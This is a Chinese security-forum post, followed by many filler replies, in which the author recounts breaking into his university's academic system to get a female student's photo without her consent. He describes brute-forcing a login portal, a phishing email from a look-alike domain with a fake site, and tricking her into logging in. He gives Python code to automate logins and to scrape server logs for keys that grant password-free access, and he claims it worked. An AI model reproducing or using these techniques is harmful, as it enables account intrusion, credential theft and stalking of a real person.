用户
搜索
  • TA的每日心情
    擦汗
    2018-11-20 20:14
  • 签到天数: 190 天

    连续签到: 1 天

    [LV.7]常住居民III

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    9

    主题

    112

    帖子

    1924

    魔法币
    收听
    3
    粉丝
    9
    注册时间
    2016-8-21

    i春秋签约作者春秋文阁

    发表于 2018-3-6 15:52:25 98762572
    本帖最后由 hlpureboy 于 2018-11-30 20:32 编辑


    套路用尽只为拿到妹子纯素颜照

    此文面向初学者,当入门的同学。文中若有错误之处,请在评论处指正

    故事伊始,原来一次好友推荐,像我这么高(men)冷(sao)的人,特别想知道加我的小姐姐长什么样?而然,我翻遍QQ空间、朋友圈、微博、知乎等一系列社交网站之后,还是没找到公开的照片,怎么办呢?

    转念一想,教务处肯定有照片,下面说一下自己的思路


    1.学校旧系统的统一认证平台存在爆破

    虽然这个漏洞很久以前就提交了,但老师一直没有修复。我校同学们一般不用统一认证平台,密码默认身份证后六位,通过统一认证平台登录教务处。记得图书馆存在弱口令,可以查看个人身份证,但是,这个洞被修复了。上burpsuite爆破了。像这样

    1

    2

    但是我这边网络质量不怎么样,极容易出现  403

    那么此路不通!

    2.邮件钓鱼来一发

    记得以前分享过,类似的例子..

    https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=24372

    考虑到以前写的东西都太零碎了,这次我把它写成了一个框架,代码放在了github上。

    地址: https://github.com/hlpureboy/PYphishing-Email

    记得给个star呀!

    以前的伪造邮件的时候都会出现有什么什么代发,这次我直接用了注册了一个相似的域名!

    域名为:xxx.tech ,刚开始打算自己打一个邮箱服务器,结果,总是被误报成垃圾邮件,觉得一些相关的协议没有配置成功,有配置过的师傅教教我!随后用个一个腾讯免费的企业邮箱,才能发送邮件。

    企业邮箱

    生成一个带有教务处的邮箱.

    企业邮箱

    配置一下相关参数smtp发信,在腾讯的帮助文档里有说明,非常简单,在这里就不赘述了!

    写一下相应的钓鱼邮件,搭建一个简单的钓鱼网站!

    emial_finish

    最终效果图如下

    end

    没有显示代发!静待妹子上钩!

    我这次用到的工具就是github那个,有什么不明白的可以再留言区问我!

    结果妹子根本有没上钩!我估计她是不看邮箱的!

    3.教务处老洞新玩法

    彪哥十分想搞学校教务处,前段时间在写教务处抢课,发现学校新版本的统一认证平台的url:

    http://xxx.xx.edu.cn/authserver/login?service=http://xx.xx.xx.xx/login_cas 登陆之后可以直接跳转到教务处 service后面跟的参数很有意思,后面跟的是教务处的url/login_cas,对新版本的url分析发现,

    最后出现一个url:http://xxx.xx.xx.xx/cas_verify.aspx?i=xxx&k=xxx  点击这个url免密登陆教务处

    写了一下自动登录统一认证平台的代码

    # encoding=utf-8
    import re
    import requests
    import sys
    from multiprocessing import Pool
    from multiprocessing.dummy import Pool as ThreadPool
    class login:
        def __init__(self,name):
            self.host="http://authserver.xxxx.edu.cn"
            self.url="http://authserver.xxx.edu.cn/authserver/login?service=http://xxx.xxx.x.x/login_cas.aspx"
            self.name=name
            self.jwc_url="http://xx.xxx.xx.xx/cas_verify.aspx?i={}&k={}"
            self.headers={
                'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
            }
            self.session=requests.session()
            self.data={
                "username":self.name,
                "password":"",
                "lt":"",
                "dllt":"userNamePasswordLogin",
                "execution":"e1s1",
                "_eventId":"submit",
                "rmShown":"1"
            }
        def paramhtml(self):
            html = self.session.get(self.url, headers=self.headers).content
            action = re.findall("action=.*x\"", html)[0]
            lt = re.findall("name=\"lt\" value=.*\"", html)[0]
            self.data["lt"] = lt.split("value")[1].split("\"")[1]
            self.post_url = self.host + action.split("\"")[1]
        def login(self,pwd):
            #print("pwd:%s" %pwd)
            self.data["password"]=pwd
            try:
                self.paramhtml()
                content = self.session.post(self.post_url, headers=self.headers, data=self.data).content
                k = re.findall("k=.*\"", content)[0]
                k = k.split("=")[1].split("\"")[0]
                #print(self.jwc_url.format(self.name, k))
                print(k)
                return k,self.jwc_url.format(self.name, k)
            except Exception,e:
                print(e.message)
                return '',''
    if __name__ == '__main__':
    
        print(login("xxxxxx").login("xxxxx"))

    还记得教务处的log敏感信息泄露么?虽然账号密码看不到了,但是从统一认证平台跳到教务处网站的记录还是存在的,C段一下,发现几个教务处的网站存在log记录,用新版统一认证平台的去构造一个新的url,在借着写教务处抢课的名义让小姐姐试试能不能登陆?登陆成功之后,在检查log记录,岂不美哉?他喵的聊天记录没了。不过key我去保存了下来!直接登录!我就不放照片了,我觉得她会把我砍了!

    下面有重点!
    写了个demo,多线程的自己改就成了!url是学校教务处的地址

    
    # encoding=utf-8
    import re
    import requests
    import datetime
    KEYS=set()
    def check_log(url,date=datetime.date.today()):
        url_log="{}/log/{}-log.txt".format(url,date)
        r=requests.get(url_log,stream=True)
        if r.status_code!=200:
            print "[+] no logs in the site"
            return
        print("[+]log url:{}".format(url_log))
        for content in r.iter_content(chunk_size=1024):
            keys = re.findall("cas_verify.aspx\?i=[0-9]+&k=[0-9,a-b,A-Z]+", content)
            #print keys
            for i in keys:
                KEYS.add(i)
        if len(KEYS)==0:
            print("[+]keys not in this log!")
        else:
            f=open("./"+url.split("//")[-1]+".txt","a")
            print("[+]keys has been foud:")
            for i in KEYS:
                print("[+] url:"+url+"/"+i)
                f.write(url+"/"+i+"\n")
            f.close()
    def all_log_check(url):
        date = datetime.datetime(datetime.datetime.now().year, 01, 01)
        while (date - datetime.datetime.today()).days <= 0:
            try:
                check_log(url,date=date.strftime("%Y-%m-%d"))
            except Exception,e:
                print(e.message)
            date = date + datetime.timedelta(days=1)


    我知道你们想像中的样子是这样的

    u=2076727592,2040020576&amp;fm=27&amp;gp=0.jpg

    实际上是这样的

    游客,如果您要查看本帖隐藏内容请回复




    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 举报 回复

    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 举报 回复
    icq0100fc34 i春秋-脚本小子 顾某人生前也是一位体面人
    推荐
    发表于 2019-1-9 09:53:32
    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 评分 举报 回复
    比你优秀的人都在努力,你努力有什么用?
    使用道具 举报 回复

    好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下的回复一下好想给你一堆六,但是似乎ichuqiu杜绝这种方式,所以水水的回复一下
    使用道具 举报 回复
    想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下
    使用道具 举报 回复

    想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下
    使用道具 举报 回复
    想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下好想给你一堆六,但是似乎 ichuqiu 杜绝这种方式,所以水水的回复一下
    使用道具 举报 回复
    我还以为能有眼福,结果我看到分析过程!emmmm我的确有眼福
    使用道具 举报 回复
    发表于 2018-3-6 17:53:33
    流觞曲水月 发表于 2018-3-6 16:17
    我还以为能有眼福,结果我看到分析过程!emmmm我的确有眼福

    大兄弟满足你
    使用道具 举报 回复

    emmmmmm,谢谢你给我买的橘子
    使用道具 举报 回复
    发表于 2018-3-6 18:13:06
    任意显!任意显!有没有这个
    不努力,拿什么养活你女人
    使用道具 举报 回复
    发表于 2018-3-6 18:29:16
    楼主666666
    使用道具 举报 回复
    好奇心迫使我回复
    使用道具 举报 回复
    666666666666666
    使用道具 举报 回复
    [斜眼笑]
    使用道具 举报 回复
    555555555555555555555555555555
    使用道具 举报 回复
    发表于 2018-3-6 19:21:30
    66666666666666666666666
    使用道具 举报 回复
    发表于 2018-3-6 19:28:44
    我知道你们想像中的样子是这样的
    使用道具 举报 回复
    发表于 2018-3-6 19:39:16
    真刺激!!
    使用道具 举报 回复
    哈哈哈哈
    使用道具 举报 回复
    想看想看
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册